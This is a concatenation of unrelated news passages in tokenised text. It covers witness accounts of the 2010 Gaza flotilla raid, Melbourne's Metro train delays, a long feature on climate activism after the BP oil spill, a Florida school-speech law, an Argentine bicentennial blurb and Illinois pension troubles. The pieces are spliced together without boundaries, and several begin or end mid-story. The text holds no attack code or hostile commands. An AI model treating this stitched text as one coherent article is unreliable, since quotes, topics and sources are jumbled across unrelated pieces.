Then the second and third came , but after these three injured soldiers then I saw a lot – maybe 10 – passengers who were severely hurt , injured , covered in blood .
They were treated in the salon next to me .
One was so badly injured I am sure he must have died soon after .
I did n't even consider going upstairs as it was just too dangerous . "
One of the strongest condemnations of Israel 's actions came from the Swedish novelist Henning Mankell who had been aboard the Swedish aid ship Sofia .
Mankell , the author of the Wallander series called for global sanctions against Israel to put pressure on it to lift the blockade of Gaza .
" I think we should use the experience of South Africa , where we know that the sanctions had a great impact .
It took time , but they had an impact , " Mankell said .
He also denied there had been any weapons aboard the aid ships .
" I can promise there was not a single weapon aboard the ships , " he told a reporter who was returning to Sweden with him after the writer had been deported by Israel .
Nilufer Cetin , a Turkish activist , and her baby boy hid in a bathroom below deck as stun grenades , live ammunition and teargas exploded above them .
Speaking on her return to Istanbul , she described how " the ship turned into a lake of blood " .
" We stayed in our cabin and played games amid the sound of gunfire , " she said .
" I protected him by staying in my cabin , then went to the bathroom .
I put a gas mask and lifejacket on my son .
They used smoke bombs followed by gas canisters .
They started to descend on to the ship with helicopters . "
She added the clashes were " extremely bad and brutal " .
Iara Lee , a Brazilian filmmaker who was also on the Mavi Marmara , claimed the Israeli troops had invaded the ship after cutting all communications and " started shooting at people " .
She spoke to Brazil 's TV Globo from the prison in southern Israel where an estimated 600 foreign activists , including around 40 Britons , were being held .
Israeli officials said tonight that they would all be freed immediately .
Lee said : " [ The attack ] was a surprise , because it happened in the middle of the night , in the darkness , in international waters , because we knew there would be a confrontation but not in international waters .
Their first tactic was to cut all of our satellite communications and then they attacked .
All I witnessed first hand was the shooting .
They came on board and started shooting at people . "
She said the commandos then sent the women to a lower level of the ship .
" They said we were terrorists – it was absurd .
They came into the part where the women were , lots and lots of them , dressed in black and with gigantic weapons as if they were in a war .
They confiscated all of our telephones and all of our luggage and took everything out of the bags and put it on the floor . "
" We expected them to shoot people in the legs , to shoot in the air , just to scare people , but they were direct , " she said , in a separate interview with the Folha de São Paulo newspaper .
" Some of them shot in the passengers ' heads .
Many people were murdered – it was unimaginable . "
The released activists gave varying accounts of the level of resistance mounted by the passengers .
Annette Groth , a German politician , described at a press conference how she had seen Israeli soldiers outside her cabin , after they had stormed the ship .
" They were shooting without warning , " she said .
" It was like war … They had guns , Taser weapons , some type of teargas and other weaponry , compared to two - and - a - half wooden sticks we had between us .
To talk of self - defence is ridiculous . "
Footage of the assault shown on Turkish TV and images released by the Israeli military clearly showed some commandos being beaten with sticks by passengers .
However , Paech said he saw no arms being used by the activists .
" There were only two men with short sticks but no knives , iron rods , pistols or any real weapons , " he said .
" Throughout our planning of the mission we said : ' no arms , no explosives ' , we said we'd only resist politically , with normal means . "
An Arab member of the Israeli Knesset , Hanin Zoabi , who was on board the Mavi Marmara , said " not a single passenger … raised a club " .
At a press conference in Nazareth , she said : " A clear message was being sent to us , for us to know that our lives were in danger .
We were not interested in a confrontation .
What we saw was five bodies .
There were only civilians and there were no weapons …
Israel spoke of a provocation , but there was no provocation . "
According to a spokeswoman for the Israeli Defence Force ( IDF ) , Avital Leibovich , its warships gave the activists several warnings before commandos were dropped from helicopters on to the deck of the Mavi Marmara .
" We found ourselves in the middle of a lynching , " she told reporters in the Israeli port of Ashdod .
About 10 activists had attacked commandos , taking their pistols , she said .
" It was a massive attack .
What happened was a last resort . "
The violence was not confined to the Mavi Marmara .
Speaking at Athens airport , Mihalis Grigoropoulos , crew on one of the other five vessels , said the Israelis came down from helicopters and threw ropes from inflatable boats , climbing aboard using teargas and live ammunition .
" We did not resist at all , we could n't even if we had wanted to , " he said .
" What could we have done against the commandos who climbed aboard ?
The only thing some people tried was to delay them from getting to the bridge , forming a human shield .
They were fired on with plastic bullets and stunned with electric devices . "
Greek activist Dimitris Gielalis , aboard a third vessel , the Sfendoni , gave a similar account .
" Suddenly from everywhere we saw inflatables coming at us , and within seconds fully equipped commandos came up on the boat .
They came up and used plastic bullets , we had beatings , we had electric shocks , any method we can think of , they used , " he said .
The tough treatment did not end after they were taken into custody in Israel , others said .
" During their interrogation , many of them were badly beaten in front of us , " said Aris Papadokostopoulos .
" There was great mistreatment after our arrest , " added Grigoropoulos .
The results come just three months after Metro took over the system , having been hand - picked by the government at a cost to taxpayers of tens of millions of dollars in consultants ' fees and tendering costs .
At the time , Mr Brumby said Metro would deliver '' more train services , greater reliability and punctuality …
They will deliver a better transport system for our state ' ' .
Yesterday the Premier was less enthusiastic .
'' They need to lift their performance , '' he said .
'' They have got an agreement with the government and that agreement is set out in writing and I believe they should be meeting it . ''
Mr Brumby said Metro had to be given ''a chance to settle in and get on top of the job .
But they 've had , what , four months now and they are not meeting their performance targets . ''
Metro's acting chief executive , Raymond O'Flaherty , said a key reason for the poor performance was a shortage of trains , partly due to continuing braking problems with the fleet of Siemens trains inherited from the previous operator , Connex .
Other reasons cited for the surge in late trains included failed overhead power lines and cancellations causing knock - on effects to other services .
The government hired Metro last year in a contract that will pay it $ 3.8 billion over eight years .
It will earn almost that much again from ticket sales , construction contracts and other revenue .
And Metro's penalties for late services are capped at $ 12 million a year - a much less onerous regime than that faced by Connex , which was liable for open - ended penalties for late and cancelled trains .
In 2009 Connex paid $ 25 million back to the government for poor performance .
RMIT academic Paul Mees , a critic of the privatised public transport system , said the Premier 's reaction to the performance results was an insult to public transport users .
'' He designed the system , he stuck with privatisation when it clearly was n't working , he chose Metro - and he told us that it would fix the problems .
To paraphrase Bill Clinton , ' It 's the system , stupid ' .
''
Public sentiment may be shifting against Metro , with an online poll of 1593
Age readers finding that 69 per cent believed Connex had run the train system better .
Under Metro's contract it must run 88 per cent of trains within five minutes of their scheduled time to avoid penalties .
It failed to do so by a large margin in February , running 83.4 per cent of trains '' on time ' ' .
However , it managed to meet its contractual requirement of cancelling fewer than 2 per cent of services .
As a result of the excessive number of late services , Metro passengers with monthly , six - monthly or yearly tickets are entitled to two free days of travel as compensation .
They can apply at train stations or online .
But travellers who use myki will not get the compensation automatically credited to their cards - despite the government having the capacity to have this function put in place .
Mr O'Flaherty said too much equipment on the system had failed since Metro took over from Connex , making the job of running trains to schedule increasingly difficult .
'' We need to fix the equipment failures , and fix them for once and for all , and that will lead to an improvement in reliability , '' he said .
He said the government , as part of the contract signed last year , had provided extra funding to fix these problems .
Mr O'Flaherty was speaking at Malvern station , where problems with trains and tracks were in evidence last weekend .
The brakes failed to work on five Siemens trains scheduled to stop there on Saturday and Sunday .
Another three Siemens trains had similar problems on Monday , leading to a total of eight six - carriage trains being withdrawn from service indefinitely .
About 45 services were cancelled yesterday , largely as a result of the Siemens trains not being in service .
Mr O'Flaherty expected some trains would return to service by tomorrow .
Photo : Craig Aurness / Corbis
A couple of months ago , before the Deepwater Horizon oil rig exploded and began spewing tens of millions of gallons of raw crude into the Gulf of Mexico , Dave Rauschkolb was just some guy with an improbable — some might even call it loopy — dream .
A surfer and the owner of three restaurants in Seaside , Florida , Rauschkolb had almost single - handedly organized 10,000 people to gather on 90 Florida beaches and join hands one Saturday in February to protest an offshore - oil - drilling bill that was making its way through the State Legislature .
He ’d called the event “ Hands Across the Sand . ”
In April , after President Obama announced that he would open up vast new expanses of America ’s seawaters to offshore drilling , Rauschkolb heard from a woman in Virginia and a man in New Jersey who wanted to hold similar events on their beaches .
He offered to help .
Then the BP oil spill happened , and Rauschkolb had an idea .
What if he took “ Hands Across the Sand ” national ?
He envisioned throngs of Americans joining hands on beaches all over the United States and , before long , he was n’t the only one dreaming big .
When the Deepwater Horizon disaster occurred on April 20 , the American environmental movement was already suffering perhaps the lowest morale of its 40 - year existence .
What had become environmentalists ’ primary mission — to convince the world to do something about climate change — was , after a few hopeful years , rapidly slipping away from them .
Climate activists were being outmaneuvered by the highly superior political - media operation of their fossil - fuel - industry - funded opponents .
The chances of enacting any meaningful climate legislation in the United States — an essential precursor to getting the rest of the world to act — were dropping precipitously .
And now , from 50 miles off the Louisiana coast and nearly a mile under the Gulf of Mexico , came this terrible , visceral image of self - inflicted environmental destruction caused by our addiction to oil .
“ Those of us who have worked on global warming for decades just ca n’t believe that here we are in a society that really has made almost no change based on the warnings that have come out , ” John Passacantando , the former executive director of Greenpeace USA , says .
“ The deep feelings of hurt and failure triggered by the spill are just overwhelming . ”
And yet any environmental activist who has been in the game long enough knows the power of a good catastrophe .
“ We really worry about the spill itself , but in the past it seems to have taken horrific events like this to wake people up , ” says Bill McKibben , the environmental writer and founder of the climate - change group 350.org .
In 1969 , the Santa Barbara oil spill and the burning Cuyahoga River helped give birth to the first Earth Day , the Environmental Protection Agency , and the Clean Air Act ; in 1979 , the Three Mile Island accident gave a dramatic boost to the anti-nuclear movement .
“ One hopes that what ’s happening in the gulf will have some of the same kind of effect , ” McKibben says .
“ This has the potential to be a galvanizing moment for the climate movement . ”
The Obama administration appears to have reached a similar conclusion .
After spending his first eighteen months in the White House refusing to aggressively push for meaningful climate and energy legislation — reportedly at the behest of Rahm Emanuel , who deemed the issue a political loser — Obama , seeking to capitalize on the spill , has now apparently devised a plan that he hopes could get a bill on his desk before the end of the year .
Granted , it takes a couple of steps of logic to get from Deepwater to the warming of the planet — to explain how even if the oil now spewing into the gulf had ended up in our gas tanks , it would have done environmental damage .
But given how unsuccessfully the environmental movement has pressed the rational case for climate - change action , some activists are wondering whether rational , dispassionate thinking is overrated .
Over the last few months , they have begun to subtly ( and not so subtly ) shift their messaging away from scientific , or even explicitly environmental , arguments and toward more direct , emotional , and , frankly , manipulative appeals .
“ The problem with the environmental movement is not that it has n’t been polite enough , it ’s that it ’s been too polite , ” says Passacantando .
“ Henry David Thoreau was once asked if he regretted anything , and he said , ‘ If I repent of anything it is very likely to be my good behavior . ’
I think that ’s what we might take from the Deepwater - well blowout and the failure to pass meaningful climate - change legislation . ”
So while the live - streaming underwater oil cam and the photos of oil - slickened pelicans are fresh on everyone ’s mind , activists have begun working them to their advantage .
When they heard of Rauschkolb ’s highly visible ( and relatively easy to engage ) Hands Across the Sand stunt , the Sierra Club delivered about 25 of its top field staffers to organize beaches in eighteen states and Greenpeace sent five employees and 500 of its top volunteer activists .
McKibben ’s group 350.org made sure that members of Congress were invited to events at beaches in their districts .
Friends of the Earth ’s media team taught local organizers how to write press releases and deal with reporters .
All told , more than a dozen national environmental groups , as well as liberal groups like MoveOn , signed on as sponsors and activated their massive e-mail lists .
Photo : From left : Paul Vathis / AP ; Gerald Herbert / AP
Which means that at noon on Saturday , June 26 , organizers hope that hundreds of thousands of people in almost every state ( and more than a dozen countries ) will go to their beaches ( or somewhere symbolic , like the White House ) and hold hands in what could be the most visible public response to the environmental catastrophe in the gulf to date .
“ People have been asking , ‘ Where ’s the outrage ? ’ ” says the Sierra Club ’s Frank Jackalone .
“ The outrage is going to be very clear on June 26 .
Hands Across the Sand will be a major turning point to push things in the other direction and toward a clean - energy future . ”
It was only two summers ago that Barack Obama and John McCain were each pledging , if elected president , to dramatically cut greenhouse - gas emissions and , according to a Washington Post–ABC News poll , 80 percent of Americans believed global warming was real .
Then the roof began to cave in .
Between Obama ’s Iowa caucus win and his inauguration , Pew found a fifteen - point drop in the number of Americans who believed global warming should be a “ top priority . ”
The economy was tanking , and the White House ’s new occupant decided that passing comprehensive climate legislation would have to take a backseat to dealing with the financial crisis and achieving health - care reform .
Last November , a Washington Post–ABC
News poll detected an eight - point drop in the number of Americans who believed global warming was happening .
That same month , thousands of private e-mails between prominent British and American climate researchers were hacked from a computer server at the University of East Anglia .
The e-mails , while embarrassing ( in one , a climatologist describes the death of a leading climate - change skeptic as “ cheering news ” ) did nothing to undermine the science behind global warming .
But that did n’t stop global - warming deniers from claiming the e-mails did just that ( “ This is not a smoking gun ; this is a mushroom cloud , ” one told the Times ) and , in a feat of political jujitsu reminiscent of the Swift Boat vets , spinning them into a pseudoscandal that was soon dubbed “ Climate - gate . ”
In December , the United Nations climate conference in Copenhagen — the culmination of a two - year process that was supposed to result in an international treaty curbing carbon emissions — ended without any binding agreement , in no small part because of the failure of the U.S. to enact its own climate legislation .
Then , in February , an epic blizzard blanketed much of the East Coast — including America ’s media and political capitals — with several feet of snow .
“ It ’s the most severe winter storm in years , which would seem to contradict Al Gore ’s hysterical global - warming theories , ” Sean Hannity crowed from the Fox News studio in New York .
Meanwhile , in Washington , Oklahoma senator Jim Inhofe — Congress ’s No. 1 climate - change denier — built an igloo near the Capitol and festooned it with signs reading HONK IF YOU ❤ GLOBAL WARMING .
The following month , Gallup reported that 48 percent of Americans thought the seriousness of global warming was exaggerated — the highest percentage since it started asking the question thirteen years ago .
The relentless string of setbacks the climate movement had been subjected to over the preceding eighteen months had coalesced into something worse .
“ It was n’t just drip , drip , drip , ” says one climate activist .
“ We were past that .
The patient was bleeding out . ”
Worst of all , the rapid collapse of the public consensus on climate change had occurred at a time when the scientific consensus about global warming was growing stronger .
“ After $ 100 million has been spent in the last year , why do n’t have we have more power ? ” Betsy Taylor , co-founder of the climate - change group 1Sky , found herself wondering this spring .
“ Why is n’t this a hot - button issue ?
Why have n’t we engaged more deeply with the public ? ”
Or as Andrew Revkin , who late last year left his job as the Times ’ climate - and - environment reporter to write an opinion blog for the paper ’s website and work as a senior fellow for environmental understanding at Pace University , puts it , “ I could spend the next twenty years trying to write really good stories about climate , the way I ’ve spent the last twenty years doing that , but I lost the sense that that was a route to efficacy .
If the social - psychology research shows people do n’t change their stances on these issues based on new information , and I ’m in the information business , then what the hell am I doing ? ”
The elemental mistake environmentalists made over the last few years — and one that Al Gore in particular can be faulted for — was assuming that people approach the subject of climate change the way environmentalists do : seriously .
But they do n’t .
For a few reasons , including perhaps the fact that the threat poses a planetary existential crisis , Americans are wildly impressionable , inconsistent , and illogical in their opinions on the subject .
Indeed , public consensus in some respects can be as unstable as the weather : Jon A. Krosnick , a social psychologist at Stanford , has attributed some of the lower polls in part to an unusually cool 2008 and this past harsh winter .
Photo : From left : Corbis ; Charlie Riedel / AP
Although the release of An Inconvenient Truth was hailed as a seminal moment for the climate movement — in language not dissimilar to that of environmentalists talking about the BP spill — in hindsight the documentary was a decidedly mixed blessing .
“ Most of the people who went to see that are what I ’d call mainstream liberal Democrats , ” says Anthony Leiserowitz , the director of the Yale Project on Climate Change Communication .
“ They liked Al Gore , they trusted Al Gore , they voted for Al Gore .
For God ’s sake , they were willing to plunk down good money to watch the guy do a slideshow . ”
The movie , in other words , persuaded the persuadable .
But for those not interested in accepting climate - change science , the film set itself up as an easy scapegoat .
“ An Inconvenient Truth intensified the polarization , because Gore is fundamentally a politician , no matter how many hours he spends looking at sea-ice models , ” says Revkin .
“ And that will always hamper his credibility with a portion of America . ”
In a January survey , Leiserowitz found that 53 percent of Americans did n’t trust Gore on global warming .
If you ’re marketing a product , consumer irrationality can be very helpful ; a confused consumer is an easily manipulated one .
But while the original Earth Day is a triumph of modern branding — and corporate America has become expert at slapping the “ green ” label on its wares — environmentalists have struggled to come up with a successful formula for selling climate change .
They still , for instance , are n’t even quite sure what to call it .
Some prefer “ global warming ” since most people do n’t like hot weather .
Others like “ climate change ” on the grounds that higher temperatures wo n’t be the only dangerous outcome .
Still others , like Gore , are partial to “ climate crisis . ”
There ’s even disagreement about the greenhouse analogy .
Some environmentalists prefer the “ blanket effect , ” arguing that people are more familiar with blankets than greenhouses — only to face the counterargument that blankets are too warm and fuzzy .
A much bigger misstep has been to talk about climate change as an “ environmental ” problem .
Leiserowitz , who has been conducting a series of surveys on Americans ’ attitudes about climate change since 2002 , has found that their most frequent association upon hearing the words “ global warming ” is “ melting ice , ” followed by “ rising temperatures , ” and then “ impacts on nonhuman nature , ” such as polar bears .
“ People overwhelmingly say melting ice is a very bad thing , ” he explains .
“ The problem is that hardly any Americans live next to a melting glacier .
It just reinforces the idea that the consequences are very distant . ”
“ The fact that the issue has been framed as an environmental issue instead of a human - well - being issue is fundamentally problematic , ” says Ed Maibach , the director of George Mason University ’s Center for Climate Change Communication .
“ It needs to be portrayed as something that ’s going to harm us and our loved ones , because that ’s the kind of thing we respond to . ”
Even before the brown pelican became the iconic image of the Deepwater explosion , the polar bear ’s reign as the climate movement ’s mascot was coming to an end .
“ The child with the inhaler or the worker in Ohio that does n’t have a job or the mom filling up her car with $ 4 - a - gallon gas — those are more effective symbols of what the future holds if we do n’t have change in our energy policies , ” says Daniel J. Weiss , the director of climate strategy at the Center for American Progress .
Late last year , a handful of former Iraq and Afghanistan vets established a group called Operation Free , which , with a partner group , VoteVets.org , is responsible for the most visceral climate - change ad in recent memory .
Titled “ Tough , ” it features footage of American troop convoys in Iraq getting blown up by IEDs — some of which , the ad contends , are made in Iran — and then , over an image of Mahmoud Ahmadinejad , an Iraq vet declares , “ Every time oil goes up one dollar , Iran gets another one - and - a - half - billion dollars to use against us . ”
A Marine scout sniper team leader who served two tours in Iraq , Matt Victoriano now spends many of his days driving around in Operation Free ’s biodiesel bus to talk about clean energy and climate change — at least until he finds out whether he ’s been accepted into the Special Forces .
“ Mission after mission when I was in Iraq , I was guarding supply routes so that our fuel could get to our forward operating bases , ” he told a small crowd in a parking lot in Greenville , South Carolina , one recent morning .
“ And it dawned on me later that we ca n’t defeat the terrorists , we ca n’t defend the country , and we ca n’t protect our own citizens with our energy policy as it exists today . ”
“ Almost everyone gets the message , ” he said earlier , as the bus rolled through Virginia .
Victoriano , who is slight with dark brown eyes and speaks in clipped sentences , had four days ’ growth of beard and Oakleys perched atop his head .
He looked less like a new environmentalist than an old sniper , and as he talked about the climate movement , he expressed frustration about some of his environmental allies .
“ One guy who was working for an environmental group wanted everybody to show up and make T - shirts , paint T - shirts , and mail them to a Senate office , ” he recalled about one of the stops the Operation Free bus had made .
“ No , I do n’t do that .
It ’s useless . ”
He preferred harder - hitting messages , like the “ Tough ” ad .
“ When I saw that I said , ‘ It ’s about time ! ’
Everybody likes to pussyfoot around this shit .
That ad throws it right in your face . ”
Photo : From left : Kiyoshi Ota/ Reuters ; Jim Young / Reuters
Some environmentalists question the wisdom of such macho posturing .
Marshall Ganz , a Harvard expert on movement - building who works with some climate activists , calls the “ Tough ” ad “ awful and jingoistic . ”
“ Talk about shortsighted , ” he says .
“ You do n’t achieve radical change by trying to finesse and pretend it ’s something it ’s not .
It ’s as if instead of Dr. King saying ‘ Freedom now , ’ he ’d said , ‘ We do n’t really want freedom , just a little bit , and actually it ’s to support America in the fight against Russia . ’ ”
But most climate activists appear to have made their peace with the security argument .
In fact , Operation Free relies on Clean Energy Works — the coalition in charge of the national lobbying campaign for the climate bill — to do much of its local organizing .
“ You have people who support the more tree - hugging , polar - bear portion , and they look at us and they ’re like , ‘ Ehh , you ’re just military guys , ’ ” Victoriano said .
“ But in the end , after they listen to us talk , they go , ‘ Okay , yeah , this is good , this is poignant , and this is going to be more decisive than anything we can do .
We need to jump on board and roll with you guys . ’ ”
Greenpeace currently has two of its boats stationed in the gulf , along with several photographers who are there to “ bear witness and in a lot of ways behave like journalists , ” explains Molly Dorozenski , a Greenpeace staffer .
( Greenpeace , for instance , takes credit for having revealed a liability waiver BP was asking its contract workers to sign . )
Almost every other environmental organization is retooling its message to engage the catastrophe .
VoteVets.org ’s latest ad features a National Guardsman assigned to clean up the BP spill who complains , “ When I signed on with the National Guard , I did it to help protect America from our enemies , like in the Persian Gulf , not to clean up an oil company ’s mess here , in the Gulf of Mexico . ”
Billy Parish , the founder of Energy Action Coalition , is working to develop a program that would allow consumers to earmark any energy savings to gulf - restoration efforts .
“ This is unlike any moment I can remember since I ’ve been doing climate campaigning , ” says May Boeve of 350.org , “ where you have a really engaged public and a really engaged press presence .
We often have to really pull people and the press kicking and screaming to pay attention .
But right now , for each event we do for the oil spill , there ’s substantial interest . ”
“ People overwhelmingly say melting ice is a very bad thing .
The problem is that hardly any Americans live next to a melting glacier . ”
Of course , the person whose interest matters most is Obama .
Despite his grandiose campaign promises to do something about climate change —
“ This was the moment when the rise of the oceans began to slow and our planet began to heal , ” he proclaimed on the night he sewed up the Democratic nomination — he has spent most of his presidency pursuing what Eric Pooley , in his new book The Climate War , quotes White House aides describing as a “ stealth strategy ” on the issue , deliberately refusing to elevate it lest the president stir up the opposition .
Alas , the opposition hardly needed Obama ’s involvement to be stirred up , and when environmentalists complained that Obama was n’t doing enough , especially in the wake of Copenhagen , it only made the White House more reticent on the issue .
“ Our side did not make Copenhagen look like a win for the president , ” says one senior environmental leader .
“ And if you were [ David ] Axelrod , you ’d be like , ‘ Fuck them .
POTUS went over there at their request and then they made them look bad . ’ ”
The spill , however , appears to have changed Obama ’s political calculus .
Now he ’s making a new push to pass comprehensive climate - and - energy legislation that ’s currently stalled in the Senate .
“ The votes may not be there right now , but I intend to find them in the coming months , ” he said in a speech in early June .
And while his prime - time address to the nation on the spill last week was not the climate - change cri de coeur many environmentalists were hoping for — indeed , he mentioned the word “ climate ” only once — the White House is at least paying the issue more prominent lip service , and shifting its place on the public agenda .
“ The fact that Obama is talking about climate - and - energy legislation in a prime - time speech from the Oval Office is qualitatively different from what was happening before the spill , ” says Pooley .
“ Not so long ago , these kinds of remarks were confined to afternoon events at solar factories . ”
If the environmental movement can’t win the media game this summer — as more beaches close , more dead turtles wash onto shore , and the currents channel oil up the Eastern Seaboard — they will have missed an opportunity of a generation .
They know this .
But they also know ( from watching the health - care debate drag on and on ) that even if Obama does invest political capital on a climate - change bill that results in meaningful legislation ( a big if ) , the fight may easily continue beyond the moment when BP eventually kills the well .
Which means they have to build a real — and sustained — movement .
Photo : From left : AP ; Maggie Fitzroy / The Times - Union
“ There are a lot of really talented lobbyists in D.C. , ” says McKibben , “ but they do n’t have anything to work with .
Senators know there is n’t that much behind them . ”
If this summer ’s BP anger is to be channeled into a fundamental rewiring of how people think about the planet , environmentalists have to get them to think about it often and in unexpected , depoliticized places .
To that end , Ed Maibach at George Mason is teaming up with the nonprofit group Climate Central to invade the local TV weather forecast , which most Americans recently reported trusting for information about global warming .
This is the kind of statistic that makes climate scientists crazy .
As does a recent poll suggesting that almost two - thirds of all TV meteorologists think there ’s no scientific consensus on the subject .
Still , since that ’s where the message is getting across , Maibach set out to shape it , enlisting a Columbia , South Carolina , weatherman named Jim Gandy as his guinea pig .
Unlike some of his TV colleagues , Gandy is a believer ; he was shocked a couple of years ago when a geology professor asked him if global warming was real .
Next month , Gandy will begin dropping into his nightly weathercasts the first of a dozen 30 - second climate - change segments he has produced with Climate Central .
One will explain that while today about six June days in Columbia hit 95 degrees , the number will almost double by around 2050 , “ if we keep pumping heat - trapping pollution into our atmosphere . ”
Another will discuss the likely increase in the number of days that hit 101 degrees by likening them to a game of craps being played with loaded dice .
“ I do n’t live in a red state .
I live in a dark - red state , ” he says .
“ If you can convince these people of global warming , you can convince anybody . ”
Maibach hopes that within the next couple of years , the local news will be flooded with Jim Gandys , forcing viewers to integrate thinking about climate change into their daily routine .
Other environmental groups are focusing on similar projects .
For years , the conventional wisdom has been that making household decisions to install compact fluorescent lamps — rather than fight for political legislation — is , in the words of some critics , an “ unstrategic use of virtue . ”
But recent neuroscience and behavioral - economics research suggest that changing people ’s individual behavior may be the best way to grow a movement .
To that end , the Natural Resources Defense Council recently presented what it calls a “ behavioral wedge ” — a list of fifteen fairly simple and affordable actions , from taking one fewer airline flight per year to eating poultry instead of red meat two days a week , that could reduce America ’s greenhouse - gas emissions by 15 percent by 2020 .
McKibben ’s 350.org is organizing global “ work parties ” — rather than political rallies — this October , during which people install solar panels on the roofs of their homes or dig community gardens in the neighborhoods .
Later this summer , Gore ’s Alliance for Climate Protection is planning to launch a program called Repower at Home that will focus on helping Americans create more energy - efficient homes .
“ The human brain is best attuned to deal with problems that are really close and really immediate , ” says Keith Goodman , who ’s in charge of the project .
“ This is designed to help us get over that action hurdle .
By giving people tasks that are more urgent at the household level , we can build that momentum . ”
A key task the project hopes to solve is the problem of public signaling .
“ One reason the Prius has been so successful is because it ’s distinctive - looking , ” says Goodman .
“ Prius owners brand themselves with it .
But when you look at other things you can do , like get your home weatherized , that ’s totally invisible .
All those peer and social effects do n’t happen . ”
Repower at Home plans to experiment with door stickers or yard flags , for example , to signal homes that have programmable thermostats .
It ’s also building a website where people can document their own energy - efficiency efforts .
The goal is to make efficiency cool .
“ How do you make it aspirational ? ” asks Goodman .
“ We need to make people feel that unless their home is efficient , they ca n’t even have people over for dinner . ”
On Thursday , June 17 , John Kerry appeared before his fellow Democratic senators , who were gathered in the Capitol ’s Mansfield Room for a caucus meeting , to make an impassioned plea for a comprehensive climate - and - energy bill .
The centerpiece of his presentation was a short video that sought to answer the question Why Now ?
Since it was aimed at a bunch of politicians worried about reelection , there was the requisite mention of recent polling data that seem to show public support for legislation that limits greenhouse gases .
But most of Kerry ’s video featured the images — and corresponding messages — that environmentalists have been working so hard to associate with climate - change .
There were pictures of oil - soaked birds and beaches , workers building wind turbines and installing solar panels , a kid with an inhaler , and even a brief shot of an unshaven Matt Victoriano with some other vets in Kerry ’s office .
The video ended with a replay of the “ Tough ” ad .
There was nary a polar bear to be seen .
No one in Washington seems to have a handle on what Obama ’s Oval Office speech signaled — or how much of this new climate - change message is getting through .
Although a number of pundits and even some environmentalists thought the address effectively doomed Kerry and Joe Lieberman ’s efforts to get the Senate to put a price on carbon —
“ Deadly Silence on Carbon Caps , ” read the Politico headline — supporters of a carbon cap had a different read .
“ My sense has always been that the person in the White House who most wants the cap is the president , ” says an environmental lobbyist , “ which is an important player to have . ”
“ I do n’t know what else people want him to do , ” says one senior Senate Democratic aide , who argues that Obama has been working hard on climate issues both publicly and privately ( for instance , calling senators to lobby against an unsuccessful effort by Alaska Republican Lisa Murkowski to bar the EPA from regulating greenhouse - gas emissions ) .
On June 23 , Obama will host a bi-partisan meeting of senators at the White House to discuss climate - and - energy legislation .
“ He ’s really fighting for this stuff , ” says the Senate aide .
What , exactly , is the president fighting for ?
Just as during the health - care debate , he ’s been maddeningly vague — at least in public .
But behind the scenes , the road map the White House and its Senate allies appear to be devising entails drafting new climate - and - energy legislation over the next few weeks and then introducing it when the Senate returns from its Fourth of July recess .
The bill would likely include new safeguards on offshore oil production and policies to reduce oil consumption , such as increasing the deployment of electric vehicles and raising efficiency standards in buildings .
It probably would n’t include a comprehensive carbon cap but , instead , would impose one just on utilities .
The thinking , according to one lobbyist , is that “ the two main sources for global - warming pollution are coal - fired power plants and using oil for transportation fuel , so if the Senate adopts a cap on carbon pollution from utilities and reduces oil use through fuel economy standards , electric cars , and natural gas trucks , then that would represent some significant carbon pollution reductions . ”
Once the bill passes , it would go to be reconciled with the House ’s own climate - and - energy legislation ( which does include a comprehensive carbon cap ) before being sent back to both houses for a final vote , likely after the November midterm elections — when , presumably , politicians will be less nervous about the consequences of their vote .
Or , conversely , the White House and the Senate could fink out and resign themselves to a so - called energy - only bill , which includes no cap on carbon .
At this point , it ’s anybody ’s guess what will happen .
But if the end result is an energy - only bill , says McKibben , it will show that Obama and the senators “ are afraid to deal with these things because they find them politically hard .
So what we have to do is keep trying to change that political reality as much as we can . ”
In other words , the movement will have failed to meet the moment .
And there ’s nothing reassuring — and actually something rather terrifying — in the knowledge that another moment will surely come again .
The Associated Press reports that Gov. Charlie Crist signed a school - speech bill Friday that prevents schools from “ infringing on the First Amendment freedoms of teachers , staff or students unless they sign a waiver . ”
What ?
One ca n’t sign away one ’s First Amendment rights .
The tersely written legislation says in its entirety :
Protection of school speech — district school boards , administrative personnel , and instructional personnel are prohibited from taking affirmative action , including , but not limited to , the entry into any agreement that infringes , or waives , the rights or freedoms afforded to instructional personnel , school staff , or students by the First Amendment to the United States Constitution , in the absence of the express written consent of any individual whose constitutional rights would be impacted by such infringement or waiver .
An earlier version of the bill would have permitted prayer at non-compulsory school events , including assemblies and sports events , but that provision was taken out before a final vote .
Of course , there is more to this story and this legislation was n’t written in a vacuum .
The new law , which goes into effect July 1 , stems from the incredibly messy fight taking place in the Santa Rosa County School District in northwest Florida .
As part of a federal - court approved settlement with the American Civil Liberties Union last year , the school board agreed to stop public prayers at school events , and the district and school officials were “ permanently prohibited from promoting , advancing , endorsing , participating in or causing prayers during or in conjunction with school events . ”
In January 2009 , principal Frank Lay and athletic director Robert Freeman were accused of violating the consent decree when “ Lay asked Freeman to offer a prayer of blessing during a school - day luncheon for the dedication of a new field house at Pace High School .
“ Freeman complied with the request and offered the prayer at the event .
It appears this was a school - sponsored event attended by students , faculty and community members . ”
In response , the Christian Educators Association International filed a motion to intervene in order to overturn the consent decree , arguing it amounted to a violation of teachers and administrators ’
First Amendment free exercise rights to practice their religion with prayer .
Noting that the battle has been a polarizing force in the community , a judge ruled in February that CEAI did not have standing and did not demonstrate that the consent decree would have a “ chilling affect ” on its members ’ religious observances .
In a news release , Liberty Counsel , Liberty University ’s legal arm , said in light of the new law it will now file a motion requesting the court overturn the consent decree .
Basically the law says that , unless they sign a waiver , teachers and staff ca n’t be legally required to stop leading school prayer and proselytizing to students .
I ca n’t believe this wo n’t go unchallenged .
I have no doubt that those evangelical educators believe their First Amendment rights were being infringed by the consent decree .
After all , do n’t hide your light under a bushel .
But school should not be a bully pulpit .
As the courts have maintained , students have the right to go to school for an education free of teachers ’ attempts to indoctrinate them to their religious beliefs .
Follow our efforts to document the effects of the Spill .
Better yet , join our team as a field observer .
Todo lo que no pudiste ver de las cinco jornadas de la histórica celebración de los 200 años de la Argentina está en este resumen fotográfico ; accedé al resumen de los hechos destacados
Congratulations of sorts go to the State of Illinois for having the most hopelessly underfunded pension plans in the US and also one of the biggest per capita budget deficits .
Topping off the misery , the Illinois Teachers Retirement System is losing money in risky derivatives bets in what one analyst says amounts to “ collecting nickels ahead of the bulldozer . ”
Given that sorry state of affairs it should be no surprise to discover Illinois Debt Default Insurance Climbs to Record .
The cost of insuring Illinois bonds against default rose to a record as lawmakers sought to close a $ 13 billion deficit in the state ’s proposed budget for the year starting July 1 .
